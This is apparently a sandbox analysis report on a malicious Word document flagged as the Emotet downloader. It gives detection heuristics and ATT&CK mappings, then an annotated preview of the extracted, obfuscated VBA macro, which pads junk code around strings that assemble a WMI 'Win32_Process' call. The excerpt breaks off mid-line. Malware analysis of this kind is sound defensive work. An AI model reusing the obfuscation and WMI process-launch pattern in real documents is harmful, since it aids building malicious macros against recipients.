MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865932-0', strongly indicating the Emotet family. The heuristics confirm the presence of VBA macros, including a high-severity 'AutoOpen' auto-execution macro and a high-severity 'GetObject' call. While the VBA code is heavily obfuscated, the presence of these indicators suggests the macro's purpose is to download and execute a secondary payload, a common Emotet tactic. The extracted macro source also concatenates the string fragments 'winm', 'gmts:Win32' and '_Process' / '_ProcessStartup' around variable names, which is consistent with the GetObject call being used to reach WMI process creation.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865932-0 — critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Emotet-6865932-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS — Document contains VBA macro code
-
AutoOpen macro — high — OLE_VBA_AUTOOPEN — AutoOpen macro
-
GetObject call — high — OLE_VBA_GETOBJ — GetObject call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC — OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL — info — EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53080 bytes |
| SHA-256: b73a221ae8b0024a77777b71f70418c2bd34141d8b479d75d3add7898ff79643 | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "d_7_517"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "a2_822"
' Analyst note: two VB_Name attributes appear back to back, so this preview is
' the concatenation of at least two extracted modules. The first, "d_7_517",
' carries VB_Base "1Normal.ThisDocument" and VB_PredeclaredId = True (the
' shape a Word document module typically has) but contributes only its
' attribute header here; the second, "a2_822", holds the code that follows.
' No Option Explicit line is present, so unassigned names below are implicit
' Variants. The AutoOpen entry point flagged by the OLE_VBA_AUTOOPEN heuristic
' is not visible in the portion of the preview reproduced here.
' B5_006: parameterless function that never assigns to its own name, so it
' returns the default Variant value (Empty). Nothing in the visible excerpt
' calls it.
' Analyst note: each Select Case below tests a name that is never assigned in
' this function (no Option Explicit is visible, so these are implicit Variants)
' against a single large integer literal; while the name is still Empty it
' compares as 0, the Case does not match, and the body is skipped. The bodies
' are object assignments plus a numeric/string mix (Fix, CBool, Oct, CStr,
' ChrB) whose results feed no observable output; if one did run with its CBool
' operand Empty, the division by CBool(...) would raise a run-time error, and
' B5_006 has no On Error handler. This reads as junk-code padding of the kind
' the report summary describes as heavy obfuscation -- presumably inserted to
' inflate the module and blunt signature/heuristic matching; confirm against
' the full module before relying on that reading. The operative statements in
' this excerpt (the "winmgmts:Win32_Process" string building) are in m8_2_9.
Function B5_006()
' The same three-statement shape repeats seven times with different names and
' literals; only the first is annotated.
Select Case G__6_0__
Case 799876756
' Unreachable while G__6_0__ is Empty (Empty <> 799876756).
Set i90542 = M714_444
D68806 = (m268_5 * Fix(994679884 / CBool(f134_6))) - O2932777 / Oct(718351250) / 733951487 + CStr(D_4636_) - 630552480 + ChrB(j471036)
Set z_9646 = f_23999
End Select
Select Case j_179460
Case 813741929
Set r722_4__ = N4818325
t9_208 = (a75551_8 * Fix(174170440 / CBool(Z_59_78))) - D14502_ / Oct(224748440) / 619291166 + CStr(K234_9_) - 941603106 + ChrB(z15_06)
Set E0310_ = A9339_
End Select
Select Case S0_7119_
Case 736594396
Set s345388 = K691609
A521058_ = (k3688698 * Fix(677905929 / CBool(B__48_1_))) - X91_84 / Oct(802887856) / 513978655 + CStr(I__05__2) - 668616613 + ChrB(v8__74)
Set T84984 = q_3_1_
End Select
Select Case n_0532_8
Case 276789524
Set L2___4_ = j1__36_6
Z_7225 = (R3_0165 * Fix(314657457 / CBool(z58__0))) - E_2_2642 / Oct(490342039) / 487471396 + CStr(o87_82_1) - 2032775 + ChrB(r7_6100)
Set u6476927 = v_8_67__
End Select
Select Case s23_356
Case 494625981
Set i_13____ = i3_21_
H05820 = (S593_7_0 * Fix(402117374 / CBool(O67_7_5))) - U2_7_358 / Oct(543251194) / 143186982 + CStr(K207605) - 135496895 + ChrB(i621_0)
Set i__47452 = F734_51
End Select
Select Case F_37780
Case 394524712
Set N731_608 = F89965_0
v__31_8_ = (P_766__ * Fix(979878472 / CBool(q5584828))) - d_1__7 / Oct(699769123) / 999748551 + CStr(s_0503) - 109499923 + ChrB(c81791)
Set M_70___ = t77_3_1
End Select
Select Case v6002_
Case 3303482
Set B1957270 = P93_5866
V_66328 = (a517_6 * Fix(248668084 / CBool(o6759_20))) - T305357 / Oct(255729515) / 623170506 + CStr(S97020) - 249337731 + ChrB(i18806)
Set J84762 = p__3739_
End Select
End Function
Function m8_2_9(h877_5_, i1_27_)
On Error Resume Next
Select Case Y2072__
Case 303432300
Set h0598_12 = T868130
H5486_9 = (I418_646 * Fix(874617992 / CBool(W77_72_))) - Y_5302 / Oct(570355307) / 377819296 + CStr(p_96__7_) - 714592625 + ChrB(j5_330)
Set C4__334 = s___3__9
End Select
Select Case N90_5_64
Case 314283047
Set L9749__7 = v1_8138_
G303_6 = (k7929_ * Fix(286693881 / CBool(W_1092))) - b0750_ / Oct(325721441) / 729891521 + CStr(A_46459_) - 28296518 + ChrB(X_46_228)
Set E__502_ = O6544_1
End Select
Select Case E91_37
Case 154721038
Set q0509_ = B02577_
m_388_ = (i19_82 * Fix(476003277 / CBool(P1340494))) - P_9316 / Oct(910342105) / 748510839 + CStr(m4_791_9) - 643605288 + ChrB(f_03_51)
Set c44894_ = S953611
End Select
r1_9624 = K_430__ + "winm" + "gmts:Win32" + z870120 + "_ProcessStartup" + Y3__9_
Select Case j09267_0
Case 454727286
Set f5090_05 = N2_1_4_
w75_6382 = (I9_90_8 * Fix(355793512 / CBool(U_9_5680))) - K3_9_45 / Oct(492417082) / 314381540 + CStr(j__1_7) - 449618907 + ChrB(O_3163)
Set c_9_155 = H_68113_
End Select
Select Case W9226_8
Case 518784214
Set s_54_78 = F60__2
j9_93_7 = (E_0_7680 * Fix(919981346 / CBool(F09_203))) - r2_36__0 / Oct(732794750) / 707739003 + CStr(J1699101) - 94519094 + ChrB(o_8_1_)
Set m45___8 = b__377_
End Select
Select Case K_2109
Case 749773923
Set Y___6_73 = v18_0319
j85_21_ = (M035__ * Fix(97789031 / CBool(o6485505))) - V_91022_ / Oct(457066824) / 988176140 + CStr(I3133_0) - 565826934 + ChrB(o2_9523)
Set q6__50 = L__9637
End Select
c210_8_ = Y0730_ + "winm" + "gmts:Win32" + R____3 + "_Process" + j_2702
Select Case L0491629
Case 341928767
Set i_9_46_7 = a6__53
j0_638_ = (Q6_412 * Fix(828022406 / CBool(k_39_6))) - k46_0443 / Oct(667703637) / 130521407 + CStr(l21340) - 18816916 + ChrB(X51_2714)
Set i37_9059 = D6___89
End Select
Select Case c637413
Case 634563125
Set D__0__4 = j_26_7_
i_637_ = (V_79616 * Fix(898498262 / C
... (truncated)
|
|||